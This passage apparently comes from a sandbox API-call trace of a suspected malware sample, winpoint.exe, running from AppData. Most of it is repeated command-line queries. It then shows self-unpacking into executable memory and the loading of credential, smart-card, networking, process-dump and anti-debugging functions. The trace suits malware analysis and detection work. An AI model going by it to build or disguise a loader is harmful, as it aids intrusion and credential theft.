IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.659] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.661] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.661] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.661] GlobalReAlloc (hMem=0x639470, dwBytes=0x6, uFlags=0x0) returned 0x639470 [0161.661] GlobalSize (hMem=0x639470) returned 0x6 [0161.661] GetTickCount () returned 0x309cf [0161.661] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76780000 [0161.661] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowContextHelpId") returned 0x767d9cac [0161.707] GetWindowContextHelpId (param_1=0x0) returned 0x0 [0161.777] GetLastError () returned 0x578 [0161.777] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa8 [0161.777] VirtualAlloc (lpAddress=0x0, dwSize=0xd20, flAllocationType=0x3000, flProtect=0x40) returned 0x2e0000 [0161.778] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualAlloc") returned 0x75ca1856 [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualProtect") returned 0x75ca435f [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryA") returned 0x75ca49d7 [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualFree") returned 0x75ca186e [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualQuery") returned 0x75ca445a [0161.778] VirtualQuery (in: lpAddress=0x484bfb, lpBuffer=0x18fc10, dwLength=0x1c | out: lpBuffer=0x18fc10*(BaseAddress=0x484000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x33000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0161.778] VirtualAlloc (lpAddress=0x0, dwSize=0x837e8, flAllocationType=0x3000, flProtect=0x4) returned 0x4c0000 [0161.778] VirtualAlloc (lpAddress=0x0, dwSize=0xaa200, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0161.819] VirtualFree (lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.821] VirtualProtect (in: lpAddress=0x400000, dwSize=0xb6000, flNewProtect=0x40, lpflOldProtect=0x18fc0c | out: lpflOldProtect=0x18fc0c*=0x2) returned 1 [0161.847] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x751e0000 [0162.202] GetProcAddress (hModule=0x751e0000, lpProcName="FreeContextBuffer") returned 0x758a9606 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="QuerySecurityPackageInfoW") returned 0x758b0d6b [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="AcquireCredentialsHandleW") returned 0x758b14f7 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="FreeCredentialsHandle") returned 0x758b0581 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="InitializeSecurityContextW") returned 0x758b1557 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="GetUserNameExW") returned 0x758aa415 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="GetUserNameExA") returned 0x758aa4e7 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="CompleteAuthToken") returned 0x758b0dbd [0162.203] LoadLibraryA (lpLibFileName="WinSCard.dll") returned 0x75700000 [0162.203] GetProcAddress (hModule=0x75700000, lpProcName="SCardReleaseContext") returned 0x757085d3 [0162.203] GetProcAddress (hModule=0x75700000, lpProcName="SCardListReadersW") returned 0x7570bb33 [0162.204] GetProcAddress (hModule=0x75700000, lpProcName="SCardGetStatusChangeW") returned 0x7570c94b [0162.204] GetProcAddress (hModule=0x75700000, lpProcName="SCardEstablishContext") returned 0x7570459f [0162.204] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x778f0000 [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName=0x73) returned 0x778f3ab2 [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName=0x97) returned 0x778f6a8a [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName="WSAIoctl") returned 0x778f2fe7 [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName=0x3) returned 0x778f3918 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x12) returned 0x778f6989 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName="getaddrinfo") returned 0x778f4296 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0xb) returned 0x778f311b [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x17) returned 0x778f3eb8 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x4) returned 0x778f6bdd [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x9) returned 0x778f2d8b [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName="freeaddrinfo") returned 0x778f4b1b [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x15) returned 0x778f41b6 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x13) returned 0x778f6f01 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x10) returned 0x778f6b0e [0162.208] GetProcAddress (hModule=0x778f0000, lpProcName=0xa) returned 0x778f3084 [0162.208] GetProcAddress (hModule=0x778f0000, lpProcName=0x6f) returned 0x778f37ad [0162.208] GetProcAddress (hModule=0x778f0000, lpProcName=0x74) returned 0x778f3c5f [0162.208] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x751c0000 [0162.212] GetProcAddress (hModule=0x751c0000, lpProcName="DestroyEnvironmentBlock") returned 0x751c1a4e [0162.212] GetProcAddress (hModule=0x751c0000, lpProcName="CreateEnvironmentBlock") returned 0x751c1a7a [0162.212] LoadLibraryA (lpLibFileName="dbghelp.dll") returned 0x750c0000 [0162.434] GetProcAddress (hModule=0x750c0000, lpProcName="MiniDumpWriteDump") returned 0x75105d38 [0162.434] LoadLibraryA (lpLibFileName="WTSAPI32.dll") returned 0x750a0000 [0162.659] GetProcAddress (hModule=0x750a0000, lpProcName="WTSEnumerateSessionsW") returned 0x750a1d49 [0162.659] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75a60000 [0162.659] GetProcAddress (hModule=0x75a60000, lpProcName="CoCreateInstance") returned 0x75aa9d0b [0162.659] GetProcAddress (hModule=0x75a60000, lpProcName="CoSetProxyBlanket") returned 0x75a75ea5 [0162.660] GetProcAddress (hModule=0x75a60000, lpProcName="CoInitializeSecurity") returned 0x75a87259 [0162.660] GetProcAddress (hModule=0x75a60000, lpProcName="CoInitializeEx") returned 0x75aa09ad [0162.660] GetProcAddress (hModule=0x75a60000, lpProcName="CoUninitialize") returned 0x75aa86d3 [0162.660] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75c90000 [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="LeaveCriticalSection") returned 0x77d52270 [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="ResetEvent") returned 0x75ca16dd [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="Sleep") returned 0x75ca10ff [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="ReadFile") returned 0x75ca3ed3 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="PrepareTape") returned 0x75d2d232 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="EraseTape") returned 0x75d2d265 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="MulDiv") returned 0x75ca1b80 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="GetLocalTime") returned 0x75ca5aa6 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpW") returned 0x75ca5929 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcpyW") returned 0x75cc3102 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="lstrlenW") returned 0x75ca1700 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="TlsFree") returned 0x75ca3587 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="CreateMutexA") returned 0x75ca4c6b [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryA") returned 0x75ca49d7 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileNameA") returned 0x75ca14b1 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleW") returned 0x75ca34b0 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="ExpandEnvironmentStringsA") returned 0x75cbeb39 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="FindAtomA") returned 0x75cbede4 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetProfileIntW") returned 0x75cc2a54 [0162.662] GetProcAddress (hModule=0x75c90000, 